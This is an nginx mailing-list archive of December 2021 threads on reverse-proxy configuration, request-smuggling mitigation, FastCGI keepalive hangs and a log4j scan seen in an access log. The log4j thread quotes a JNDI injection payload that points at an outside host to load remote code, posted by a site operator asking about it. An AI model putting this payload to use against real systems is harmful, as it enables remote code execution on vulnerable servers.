AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.008 0.008 "2.62" [03/Dec/2021:17:54:29 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/themes/pwm/mobileStyle.css HTTP/1.1" 200 1552 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.010 0.008 "2.62" [03/Dec/2021:17:54:29 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/style-print.css HTTP/1.1" 200 1547 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.013 0.012 "2.63" Posted at Nginx Forum: https://forum.nginx.org/read.php?2,292998,293008#msg-293008 From francis at daoine.org Sat Dec 4 08:56:38 2021 From: francis at daoine.org (Francis Daly) Date: Sat, 4 Dec 2021 08:56:38 +0000 Subject: Internal application - Publish on nginx In-Reply-To: <660c1368b9068e8129e77debb3c6fb63.NginxMailingListEnglish@forum.nginx.org> References: <20211203155939.GU12557@daoine.org> <660c1368b9068e8129e77debb3c6fb63.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20211204085638.GW12557@daoine.org> On Fri, Dec 03, 2021 at 12:57:06PM -0500, agomes wrote: Hi there, It looks like your /pwm/public/forgottenpassword page wants lots of content from /pwm/public/resources. I expect that you still do not want to publish /pwm/private/login. If you are happy to expose all of /pwm/public/, and you are happy for the users to see the /pwm/public/ urls in their browser, then it might be easier to proxy_pass /pwm/public/ to /pwm/public/, and to redirect the short "reset password" url that you want to advertise, to the longer one. That could be something like location = /app { return 301 /pwm/public/forgottenpassword; } location /pwm/public/ { proxy_pass https://myappp; } If you need "proxy_set_header Host $host;", then add it; you may not need a proxy_redirect depending on what the internal server actually returns. If you have other "location ~" parts in your nginx config, you should consider using "location ^~ /pwm/public/" for the second one instead. > Error > Password Self Service PWM > Error > > PWM 5025 > > > Maximum login attempts for this session have been exceeded. Try again > later. I suspect that that will be related to the cookie thing -- the login probably wants the confirmation cookie, but because the pwm service tells the browser to only return the cookie to requests below /pwm, and the browser is requesting /app, the browser is not sending the cookie. With the new suggested config, the browser will be requesting things below /pwm, and should send the cookie. If the /pwm application considers "session" to be "source IP", then when it is reverse-proxied, it will see all traffic from the one IP address,which might confuse it. > [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET /app/ HTTP/1.1" 200 104 "-" > "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like > Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" > 0.007 0.008 "0.88" That is: a request to /app/ got a small http 200 response. But then the next request is browser requesting /pwm, with a Referer of /app/ -- it might be interesting to see why that was. Maybe you need to publish more than just /pwm/public? 
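If it turns out that you do, an untested sketch that publishes everything below /pwm/ apart from the private area could be:

# longest matching prefix wins, so the private area is refused
# before the general /pwm/ block applies
location /pwm/private/ {
    return 403;
}
location /pwm/ {
    proxy_pass https://myappp;
}

("myappp" here is just the upstream name from your own config; adjust as needed.)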
(Actually: I suspect that in this case, the "/app/" request was direct to the internal server, which possibly is configured to return a javascript redirect to "/pwm" for anything unknown. So a better test, going direct to the internal server, would be too start with /pwm/public/forgottenpassword. But maybe it won't be needed, if the new suggested config Just Works.) > [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET /pwm HTTP/1.1" 302 5 > "x.x.x.x/app/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 > (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" > "x.x.x.x:8443" 0.005 0.004 "-" "/pwm" redirected to "/pwm/". > [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET /pwm/ HTTP/1.1" 200 1430 > "x.x.x.x/app/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 > (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" > "x.x.x.x:8443" 0.011 0.008 "-" And "/pwm/" had lots of content below "/pwm/public/": > [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET > /pwm/public/resources/nonce-135vkyu/pwm-icons.css HTTP/1.1" 200 1549 > "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 > (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" > "x.x.x.x:8443" 0.005 0.004 "2.63" ... Hopefully that will get you closer to where you want to be. Good luck with it! f -- Francis Daly francis at daoine.org From i at qingly.me Sun Dec 5 15:24:38 2021 From: i at qingly.me (wordlesswind) Date: Sun, 5 Dec 2021 23:24:38 +0800 Subject: The certificate of quic.nginx.org has expired Message-ID: <24c887c2-f089-6e5b-6ea6-e44fa6ff3063@qingly.me> Hello, I noticed that the certificate of quic.nginx.org has expired. Best Regards, wordlesswind From gglater62 at gmail.com Mon Dec 6 09:01:22 2021 From: gglater62 at gmail.com (Witold Filipczyk) Date: Mon, 6 Dec 2021 10:01:22 +0100 Subject: Copy headers with internal redirect Message-ID: Hi, There is location ~ ^/blahblah/ { internal; } There is also Apache which set header X-Accel-Redirect. For example X-Accel-Redirect: /blahblah/1 but also set other headers. How in nginx copy all these headers to the client? Do you know such a module? Or how to write something like this? From pluknet at nginx.com Mon Dec 6 09:24:14 2021 From: pluknet at nginx.com (Sergey Kandaurov) Date: Mon, 6 Dec 2021 12:24:14 +0300 Subject: The certificate of quic.nginx.org has expired In-Reply-To: <24c887c2-f089-6e5b-6ea6-e44fa6ff3063@qingly.me> References: <24c887c2-f089-6e5b-6ea6-e44fa6ff3063@qingly.me> Message-ID: <4A37FA11-2881-4D5A-9368-F5D1578F3756@nginx.com> > On 5 Dec 2021, at 18:24, wordlesswind wrote: > > Hello, > > > I noticed that the certificate of quic.nginx.org has expired. > It should be fixed now. -- Sergey Kandaurov From ssoudri at cisco.com Fri Dec 10 11:46:48 2021 From: ssoudri at cisco.com (Sai Vishnu Soudri (ssoudri)) Date: Fri, 10 Dec 2021 11:46:48 +0000 Subject: What are NGINX reverse proxy users doing to prevent HTTP Request smuggling? Message-ID: Hi everyone, I'm a new NGINX user and I want to understand what NGINX reverse proxy users are doing to mitigate HTTP request smuggling vulnerability. I understand that NGINX does not support sending HTTP/2 requests upstream. Since the best way to prevent HTTP Request Smuggling is by sending HTTP/2 requests end to end. I believe NGINX when used as a reverse proxy could expose my backend server to HTTP request smuggling when it converts incoming HTTP/2 requests to HTTP/1.1 before sending it upstream. 
Apart from the web application firewall (WAF) from NGINX App Protect, is there any other solution to tackle this vulnerability? I am relatively new to NGINX and reverse proxies, if NGINX or its users does have an alternate solution, please do share. Thank you. Regards, Sai Vishnu Soudri -------------- next part -------------- An HTML attachment was scrubbed... URL: From sscotti at sias.dev Sun Dec 12 05:27:07 2021 From: sscotti at sias.dev (Stephen D. Scotti, M.D.) Date: Sat, 11 Dec 2021 23:27:07 -0600 Subject: Question about rewrite in nginx.conf using a variable ? Message-ID: <002FD0DA-572A-402E-9322-A7B18F1CB29E@sias.dev> I have a configuration for a Docker NGINX container that works OK with my 'static' configuration, but I?d like to maybe use a variable in the proxy rewrite to avoid have to duplicate a location block for the server. A sample Static setup with some of the extra stuff removed is shown below. That actually 'works' when I explicitly specify /pacs-1/ and /pacs-2/. pacs-1 and pacs-2 happen to also be the name for other servers in my Docker Setup, so http://pacs-1:8042 resolves to the docker container since it is called from Docker. Those servers are not accessible outside of the container, which is one reason why I proxy some requests made to it from outside of the container. I?m curious if it is possible to rewrite that such that I can match one of several container name from the request URI, e.g. something like location ~ ^/(pacs-butterfly|pacs-1|pacs-2)(/.*) I tried various options, including setting a variable and nothing seems to work yet. I could just create a separate block for each server, but it would be nice to generalize it so it would always work as long as the request uri corresponds to an existing container. Thanks. . location /pacs-1/ { if ($request_method = 'OPTIONS') { return 204; } auth_request /auth; auth_request_set $auth_status $upstream_status; proxy_buffering off; rewrite /pacs-1/(.*) /$1 break; proxy_pass http://pacs-1:8042 ; proxy_redirect http://pacs-1:8042/ /; proxy_set_header HOST $host; } location /pacs-2/ { if ($request_method = 'OPTIONS') { return 204; } auth_request /auth; auth_request_set $auth_status $upstream_status; proxy_buffering off; rewrite /pacs-2/(.*) /$1 break; proxy_pass http://pacs-2:8042 ; proxy_redirect http://pacs-2:8042/ /; proxy_set_header HOST $host; } Stephen D. Scotti -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 3887 bytes Desc: not available URL: From mdounin at mdounin.ru Mon Dec 13 22:18:21 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 14 Dec 2021 01:18:21 +0300 Subject: What are NGINX reverse proxy users doing to prevent HTTP Request smuggling? In-Reply-To: References: Message-ID: Hello! On Fri, Dec 10, 2021 at 11:46:48AM +0000, Sai Vishnu Soudri (ssoudri) wrote: > Hi everyone, > > I'm a new NGINX user and I want to understand what NGINX reverse > proxy users are doing to mitigate HTTP request smuggling > vulnerability. I understand that NGINX does not support sending > HTTP/2 requests upstream. > > Since the best way to prevent HTTP Request Smuggling is by > sending HTTP/2 requests end to end. I believe NGINX when used as > a reverse proxy could expose my backend server to HTTP request > smuggling when it converts incoming HTTP/2 requests to HTTP/1.1 > before sending it upstream. 
> > Apart from the web application firewall (WAF) from NGINX App > Protect, is there any other solution to tackle this > vulnerability? I am relatively new to NGINX and reverse proxies, > if NGINX or its users does have an alternate solution, please do > share. There are no know vulnerabilities in nginx which make request smuggling possible. In particular, HTTP/2 code properly rejects things like ":" or newlines in headers and checks the request body length from the very start. Further, various mitigations introduced in nginx 1.21.x are believed to stop most, if not all, known attacks even assuming various known vulnerabilities of a server in front of nginx and/or behind nginx. Probably the only thing to care about are inherently insecure settings like "ignore_invalid_headers off;"[1] and "underscores_in_headers on;"[2]. These are better to be kept in their default values unless you understand possible implications in your particular setup. [1] http://nginx.org/r/ignore_invalid_headers [2] http://nginx.org/r/underscores_in_headers -- Maxim Dounin http://mdounin.ru/ From ssoudri at cisco.com Tue Dec 14 14:50:19 2021 From: ssoudri at cisco.com (Sai Vishnu Soudri (ssoudri)) Date: Tue, 14 Dec 2021 14:50:19 +0000 Subject: What are NGINX reverse proxy users doing to prevent HTTP Request smuggling? In-Reply-To: References: Message-ID: <6427103F-FFBD-4CF4-BB9A-8E9AC14A13F5@cisco.com> Hi Maxim, Thanks a lot for your reply. Just to clarify, by "There are no know vulnerabilities in nginx which make request smuggling possible" you mean after the 1.21.x release right? I am using OpenResty and the latest version of OpenResty is based on mainline nginx core 1.19.9. Currently, the approach I'm taking to mitigate HTTP Request Smuggling is blocking all incoming HTTP/1.1 requests. I was worried if incoming HTTP/2 requests would pose a vulnerability as nginx converts it before sending upstream, but with your reply I believe that should not be a problem anymore. Since OpenResty is not able to leverage the new changes added in 1.21.x, do you suggest I continue with this approach till OpenResty can leverage the changes made in 1.21.x or is it mandatory to use 1.21.x and block HTTP/1.1 requests to prevent request smuggling. Thank you, Sai Vishnu Soudri ?On 14/12/21, 3:48 AM, "nginx on behalf of Maxim Dounin" wrote: Hello! On Fri, Dec 10, 2021 at 11:46:48AM +0000, Sai Vishnu Soudri (ssoudri) wrote: > Hi everyone, > > I'm a new NGINX user and I want to understand what NGINX reverse > proxy users are doing to mitigate HTTP request smuggling > vulnerability. I understand that NGINX does not support sending > HTTP/2 requests upstream. > > Since the best way to prevent HTTP Request Smuggling is by > sending HTTP/2 requests end to end. I believe NGINX when used as > a reverse proxy could expose my backend server to HTTP request > smuggling when it converts incoming HTTP/2 requests to HTTP/1.1 > before sending it upstream. > > Apart from the web application firewall (WAF) from NGINX App > Protect, is there any other solution to tackle this > vulnerability? I am relatively new to NGINX and reverse proxies, > if NGINX or its users does have an alternate solution, please do > share. There are no know vulnerabilities in nginx which make request smuggling possible. In particular, HTTP/2 code properly rejects things like ":" or newlines in headers and checks the request body length from the very start. 
Further, various mitigations introduced in nginx 1.21.x are believed to stop most, if not all, known attacks even assuming various known vulnerabilities of a server in front of nginx and/or behind nginx. Probably the only thing to care about are inherently insecure settings like "ignore_invalid_headers off;"[1] and "underscores_in_headers on;"[2]. These are better to be kept in their default values unless you understand possible implications in your particular setup. [1] http://nginx.org/r/ignore_invalid_headers [2] http://nginx.org/r/underscores_in_headers -- Maxim Dounin http://mdounin.ru/ _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx From mdounin at mdounin.ru Tue Dec 14 22:16:51 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 15 Dec 2021 01:16:51 +0300 Subject: What are NGINX reverse proxy users doing to prevent HTTP Request smuggling? In-Reply-To: <6427103F-FFBD-4CF4-BB9A-8E9AC14A13F5@cisco.com> References: <6427103F-FFBD-4CF4-BB9A-8E9AC14A13F5@cisco.com> Message-ID: Hello! On Tue, Dec 14, 2021 at 02:50:19PM +0000, Sai Vishnu Soudri (ssoudri) wrote: > Thanks a lot for your reply. Just to clarify, by "There are no > know vulnerabilities in nginx which make request smuggling > possible" you mean after the 1.21.x release right? > I am using OpenResty and the latest version of OpenResty is > based on mainline nginx core 1.19.9. Supported releases are 1.20.2 stable and 1.21.4 mainline, see http://nginx.org/en/download.html. Though 1.19.9 isn't much different. > Currently, the approach I'm taking to mitigate HTTP Request > Smuggling is blocking all incoming HTTP/1.1 requests. I was > worried if incoming HTTP/2 requests would pose a vulnerability > as nginx converts it before sending upstream, but with your > reply I believe that should not be a problem anymore. > > Since OpenResty is not able to leverage the new changes added in > 1.21.x, do you suggest I continue with this approach till > OpenResty can leverage the changes made in 1.21.x or is it > mandatory to use 1.21.x and block HTTP/1.1 requests to prevent > request smuggling. I don't think you need to do anything special to prevent request smuggling unless you are using a buggy server in front of nginx. -- Maxim Dounin http://mdounin.ru/ From nginx-forum at forum.nginx.org Wed Dec 15 04:09:15 2021 From: nginx-forum at forum.nginx.org (eboats) Date: Tue, 14 Dec 2021 23:09:15 -0500 Subject: Multipart/form-data proxy pass? Message-ID: Hello, I'm using nginx as a proxy to a backend API that takes a POST payload of a csv file ( content type = multipart/form-data ). I can see the request getting to the API but the file is not being passed by nginx. What nginx config params do I need for nginx to pass the multipart/form-data to the backend API? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,293076,293076#msg-293076 From osa at freebsd.org.ru Wed Dec 15 04:14:50 2021 From: osa at freebsd.org.ru (Sergey A. Osokin) Date: Wed, 15 Dec 2021 07:14:50 +0300 Subject: Multipart/form-data proxy pass? In-Reply-To: References: Message-ID: Hi, On Tue, Dec 14, 2021 at 11:09:15PM -0500, eboats wrote: > Hello, > I'm using nginx as a proxy to a backend API that takes a POST payload > of a csv file ( content type = multipart/form-data ). I can see the request > getting to the API but the file is not being passed by nginx. > > What nginx config params do I need for nginx to pass the multipart/form-data > to the backend API? 
Is there any error messages in the NGINX's error.log file? -- Sergey Osokin From nginx-forum at forum.nginx.org Wed Dec 15 04:28:02 2021 From: nginx-forum at forum.nginx.org (eboats) Date: Tue, 14 Dec 2021 23:28:02 -0500 Subject: Multipart/form-data proxy pass? In-Reply-To: References: Message-ID: I don't see any errors in the logs - the request gets to the backend API ok but am wondering what nginx config params may be involved in handling content_type= multipart/form-data. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,293076,293078#msg-293078 From francis at daoine.org Wed Dec 15 09:09:39 2021 From: francis at daoine.org (Francis Daly) Date: Wed, 15 Dec 2021 09:09:39 +0000 Subject: Multipart/form-data proxy pass? In-Reply-To: References: Message-ID: <20211215090939.GY12557@daoine.org> On Tue, Dec 14, 2021 at 11:28:02PM -0500, eboats wrote: Hi there, > I don't see any errors in the logs - the request gets to the backend API ok > but am wondering what nginx config params may be involved in handling > content_type= multipart/form-data. As far as nginx is concerned, I'm pretty sure that "proxy_pass" is enough. Can you show a small nginx config that does not handle your request in the way that you want it to be handled? f -- Francis Daly francis at daoine.org From 877509395 at qq.com Sat Dec 18 05:37:11 2021 From: 877509395 at qq.com (=?ISO-8859-1?B?aHVpbWluZw==?=) Date: Sat, 18 Dec 2021 13:37:11 +0800 Subject: bandwidth limit for specific server Message-ID: Hi,       Is it possible to limit total bandwidth for server?   http {     include       mime.types;     default_type  application/octet-stream;     #access_log  /usr/local/nginx/logs/access.log  main;     access_log  off;     sendfile        on;     #tcp_nopush     on;     #keepalive_timeout  0;     keepalive_timeout  1;     client_max_body_size 50m;     gzip  on;     server_tokens off;     server {         listen       443 ssl;         server_name  x.x.x.x.x;         is it possible to limit total bandwidth for this server to for example 5M ? not to limit TCP connection bandwidth. need total bandwidth.         location / {         }         error_page 404 /404.html;             location = /40x.html {         }         error_page 500 502 503 504 /50x.html;             location = /50x.html {         }     }     include /usr/local/nginx/clientcfg/*.conf; } thanks in advance. huiming -------------- next part -------------- An HTML attachment was scrubbed... URL: From Nicolas.Franck at UGent.be Sun Dec 19 19:56:51 2021 From: Nicolas.Franck at UGent.be (Nicolas Franck) Date: Sun, 19 Dec 2021 19:56:51 +0000 Subject: keepalive connection to fastcgi backend hangs Message-ID: <35BF7F7A-6589-4CBA-A6B1-1A14D42401BB@ugent.be> I've created a server setup where nginx acts as a proxy server for a fastcgi application. That last application is running on a different server on port 9000. It is spawn with spawn-fcgi. Recently I have found out that nginx closes the connection after every request. In order to make nginx keep the tcp connections alive, I've added the following settings: * proxy_socket_keepalive on * proxy_http_version 1.1; * proxy_set_header Connection ""; * fastcgi_keep_conn on; * added an upstream "fgi": upstream fcgi { keepalive 10; server myhost:9000; } * added a location block (only snippet given): location /fcgi { fastcgi_pass_request_headers on; fastcgi_pass fcgi; fastcgi_keep_conn on; } What I see: after a couple of requests nginx "hangs" when I visit path "/fcgi". 
This disappears when

 * I remove the setting "keepalive" from the upstream (but that disables keepalive altogether)
 * I bind the fcgi application to a unix socket, and let nginx connect to that. But that requires nginx and the fcgi to be on the same server.
 * I reduce the number of nginx workers to exactly 1. Not sure why that works.
 * I spawn the application with the tool "supervisord" (a fcgi process manager written in python)

Does anyone know what is happening here?
FastCGI has little documentation on the web.

Example of an application: fcgi_example.cpp

#include <fcgiapp.h>
#include <fcgio.h>
#include <iostream>

void handle_request(FCGX_Request& request){
    // wrap the FastCGI output stream so it can be used as a std::ostream
    fcgi_streambuf cout_fcgi_streambuf(request.out);
    std::ostream os{&cout_fcgi_streambuf};
    os << "HTTP/1.1 200 OK\r\n"
       << "Content-type: text/plain\r\n\r\n"
       << "Hello!\r\n";
}

int main(){
    FCGX_Request request;
    FCGX_Init();
    FCGX_InitRequest(&request, 0, 0);
    // accept and handle requests one at a time
    while (FCGX_Accept_r(&request) == 0) {
        handle_request(request);
    }
}

Build: g++ -std=c++11 -o fcgi_example fcgi_example.cpp -lfcgi++ -lfcgi
Spawn: spawn-fcgi -f /path/to/fcgi_example -p 9000
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 
From lists at lazygranch.com Mon Dec 20 04:02:08 2021
From: lists at lazygranch.com (lists at lazygranch.com)
Date: Sun, 19 Dec 2021 20:02:08 -0800
Subject: 200 html return to log4j exploit
Message-ID: <20211219200208.691f776b.lists@lazygranch.com>

I don't have any service using java so I don't believe I am subject to
this exploit. However I am confused why it returned a 200 for this
request. The special characters in the URL are confusing.

200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-"

log_format main '$status $remote_addr - $remote_user [$time_local] "$request" ' '$body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"';

That is my log format from the nginx.conf.

I now have a map to catch "jndi" in both url and agent. So far so good, not that it matters much. I just like to gather IP addresses from hackers and block their host if it lacks eyeballs,

From francis at daoine.org Mon Dec 20 09:19:36 2021
From: francis at daoine.org (Francis Daly)
Date: Mon, 20 Dec 2021 09:19:36 +0000
Subject: 200 html return to log4j exploit
In-Reply-To: <20211219200208.691f776b.lists@lazygranch.com>
References: <20211219200208.691f776b.lists@lazygranch.com>
Message-ID: <20211220091936.GZ12557@daoine.org>

On Sun, Dec 19, 2021 at 08:02:08PM -0800, lists at lazygranch.com wrote:

Hi there,

> I don't have any service using java so I don't believe I am subject to
> this exploit. However I am confused why it returned a 200 for this
> request. The special characters in the URL are confusing.
>
> 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-"

The request was "GET / HTTP/1.1". A 200 return for that is quite normal.

> log_format main '$status $remote_addr - $remote_user
> [$time_local] "$request" ' '$body_bytes_sent "$http_referer" '
> '"$http_user_agent" "$http_x_forwarded_for"';

The "please be exploited" parts are in the $http_referer and $http_user_agent parts of your log line. (And so, are presumably in the matching request headers.) 
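Since you mention already using a map to catch "jndi" in both url and agent: for completeness, an untested sketch of that kind of thing could be, at http{} level (the variable name is arbitrary):

map "$request_uri$http_referer$http_user_agent" $jndi_probe {
    default 0;
    "~*jndi" 1;
}

and then, inside the server{} block:

    if ($jndi_probe) {
        return 403;
    }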
Cheers, f -- Francis Daly francis at daoine.org From mdounin at mdounin.ru Mon Dec 20 14:11:49 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 20 Dec 2021 17:11:49 +0300 Subject: keepalive connection to fastcgi backend hangs In-Reply-To: <35BF7F7A-6589-4CBA-A6B1-1A14D42401BB@ugent.be> References: <35BF7F7A-6589-4CBA-A6B1-1A14D42401BB@ugent.be> Message-ID: Hello! On Sun, Dec 19, 2021 at 07:56:51PM +0000, Nicolas Franck wrote: > In order to make nginx keep the tcp connections alive, > I've added the following settings: > > * proxy_socket_keepalive on > * proxy_http_version 1.1; > * proxy_set_header Connection ""; Just a side note: you don't need any of these to keep FastCGI connections alive. > * fastcgi_keep_conn on; > * added an upstream "fgi": > > upstream fcgi { > keepalive 10; > server myhost:9000; > } > > * added a location block (only snippet given): > > location /fcgi { > fastcgi_pass_request_headers on; > fastcgi_pass fcgi; > fastcgi_keep_conn on; > } > > What I see: after a couple of requests nginx "hangs" when I > visit path "/fcgi". > > This disappears when > > * I remove the setting "keepalive" from the upstream (but that > disables keepalive altogether) > * bind the fcgi application to a unix socket, and let nginx bind > to that. But that requires nginx and the fcgi to be on the same > server. > * reduce the number of nginx workers to exactly 1. Not sure why > that works. > * I spawn the application with tool "supervisord" (a fcgi > process manager written in python) > > Does anyone know what is happening here? > Fcgi has little documentation on the web.. [...] > Spawn: spawn-fcgi -f /path/to/fcgi_example.cpp -p 9000 The spawn-fcgi defaults to 1 child process, and each child process can handle just one connection. On the other hand, your configuration instruct nginx to cache up to 10 connections per nginx process. As long as the only one connection your upstream server can handle is cached in another nginx process, nginx won't be able able to reach the upstream server, and will return 504 Gateway Timeout error once the fastcgi_connect_timeout expires (60s by default). Likely this is something you see as "hangs". Obvious fix would be to add additional fastcgi processes. Given "keepalive 10;" in nginx configuration, you'll need at least 10 * . Something like: spawn-fcgi -F 20 -f /path/to/fcgi -p 9000 should fix things for up to 2 nginx worker processes. Just in case, that's exactly the problem upstream keepalive documentation warns about (http://nginx.org/r/keepalive): "The connections parameter should be set to a number small enough to let upstream servers process new incoming connections as well". -- Maxim Dounin http://mdounin.ru/ From Nicolas.Franck at UGent.be Mon Dec 20 16:00:59 2021 From: Nicolas.Franck at UGent.be (Nicolas Franck) Date: Mon, 20 Dec 2021 16:00:59 +0000 Subject: keepalive connection to fastcgi backend hangs In-Reply-To: References: <35BF7F7A-6589-4CBA-A6B1-1A14D42401BB@ugent.be> Message-ID: <04EB529A-A043-4F8F-B6F6-C8C6B7020C5B@ugent.be> Interesting! I looks like there is nothing that managing the incoming connections for the fcgi workers. Every fcgi worker needs to do this on its own, right? So if there are more clients (i.e. nginx workers) than fcgi workers, then it becomes unresponsive after a few requests, because all the fcgi workers are holding on to a connection to an nginx worker, and there seems to be no queue handling this. Is this correct? Just guessing here > On 20 Dec 2021, at 15:11, Maxim Dounin wrote: > > Hello! 
> > On Sun, Dec 19, 2021 at 07:56:51PM +0000, Nicolas Franck wrote: > >> In order to make nginx keep the tcp connections alive, >> I've added the following settings: >> >> * proxy_socket_keepalive on >> * proxy_http_version 1.1; >> * proxy_set_header Connection ""; > > Just a side note: you don't need any of these to keep FastCGI > connections alive. > >> * fastcgi_keep_conn on; >> * added an upstream "fgi": >> >> upstream fcgi { >> keepalive 10; >> server myhost:9000; >> } >> >> * added a location block (only snippet given): >> >> location /fcgi { >> fastcgi_pass_request_headers on; >> fastcgi_pass fcgi; >> fastcgi_keep_conn on; >> } >> >> What I see: after a couple of requests nginx "hangs" when I >> visit path "/fcgi". >> >> This disappears when >> >> * I remove the setting "keepalive" from the upstream (but that >> disables keepalive altogether) >> * bind the fcgi application to a unix socket, and let nginx bind >> to that. But that requires nginx and the fcgi to be on the same >> server. >> * reduce the number of nginx workers to exactly 1. Not sure why >> that works. >> * I spawn the application with tool "supervisord" (a fcgi >> process manager written in python) >> >> Does anyone know what is happening here? >> Fcgi has little documentation on the web.. > > [...] > >> Spawn: spawn-fcgi -f /path/to/fcgi_example.cpp -p 9000 > > The spawn-fcgi defaults to 1 child process, and each child process > can handle just one connection. On the other hand, your > configuration instruct nginx to cache up to 10 connections per > nginx process. > > As long as the only one connection your upstream server can handle > is cached in another nginx process, nginx won't be able able to > reach the upstream server, and will return 504 Gateway Timeout > error once the fastcgi_connect_timeout expires (60s by default). > Likely this is something you see as "hangs". > > Obvious fix would be to add additional fastcgi processes. Given > "keepalive 10;" in nginx configuration, you'll need at least 10 * > . Something like: > > spawn-fcgi -F 20 -f /path/to/fcgi -p 9000 > > should fix things for up to 2 nginx worker processes. > > Just in case, that's exactly the problem upstream keepalive > documentation warns about (https://eur03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fnginx.org%2Fr%2Fkeepalive&data=04%7C01%7CNicolas.Franck%40ugent.be%7Ce982b61a75624979ba3708d9c3c2b12b%7Cd7811cdeecef496c8f91a1786241b99c%7C1%7C0%7C637756063709619074%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=mHb200pbVMC0oS0HrbLY31hX3QyLQV0WQLoyt%2Fh96eM%3D&reserved=0): "The > connections parameter should be set to a number small enough to > let upstream servers process new incoming connections as well". 
> > -- > Maxim Dounin > https://eur03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fmdounin.ru%2F&data=04%7C01%7CNicolas.Franck%40ugent.be%7Ce982b61a75624979ba3708d9c3c2b12b%7Cd7811cdeecef496c8f91a1786241b99c%7C1%7C0%7C637756063709619074%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=vgJOdIzYbvba1kqXCKAiMY%2FPyNx3RgyQonp9cbLXZ6Q%3D&reserved=0 > _______________________________________________ > nginx mailing list > nginx at nginx.org > https://eur03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fmailman.nginx.org%2Fmailman%2Flistinfo%2Fnginx&data=04%7C01%7CNicolas.Franck%40ugent.be%7Ce982b61a75624979ba3708d9c3c2b12b%7Cd7811cdeecef496c8f91a1786241b99c%7C1%7C0%7C637756063709619074%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=qNyDaV%2B0p4cuTlcFkBZeKN3gCT0A03xIMrb5qOOeBFk%3D&reserved=0 From jay at gooby.org Mon Dec 20 17:49:48 2021 From: jay at gooby.org (Jay Caines-Gooby) Date: Mon, 20 Dec 2021 17:49:48 +0000 Subject: 200 html return to log4j exploit In-Reply-To: <20211219200208.691f776b.lists@lazygranch.com> References: <20211219200208.691f776b.lists@lazygranch.com> Message-ID: The request is for your index page "GET / HTTP/1.1"; that's why your server responded with 200 OK. The special characters are in the referer and user-agent fields, as a log4j system would also try to interpolate these, and thus be vulnerable to the exploit. On Mon, 20 Dec 2021 at 04:02, lists at lazygranch.com wrote: > I don't have any service using java so I don't believe I am subject to > this exploit. Howerver I am confused why a returned a 200 for this > request. The special characters in the URL are confusing. > > 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-" > > log_format main '$status $remote_addr - $remote_user > [$time_local] "$request" ' '$body_bytes_sent "$http_referer" ' > '"$http_user_agent" "$http_x_forwarded_for"'; > > That is my log format from the nginx.conf. > > I now have a map to catch "jndi" in both url and agent. So far so good > not that it matters much. I just like to gather IP addresses from > hackers and block their host if it lacks eyeballs, > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Jay Caines-Gooby http://jay.gooby.org jay at gooby.org +44 (0)7956 182625 twitter, skype & aim: jaygooby gtalk: jaygooby at gmail.com -------------- next part -------------- An HTML 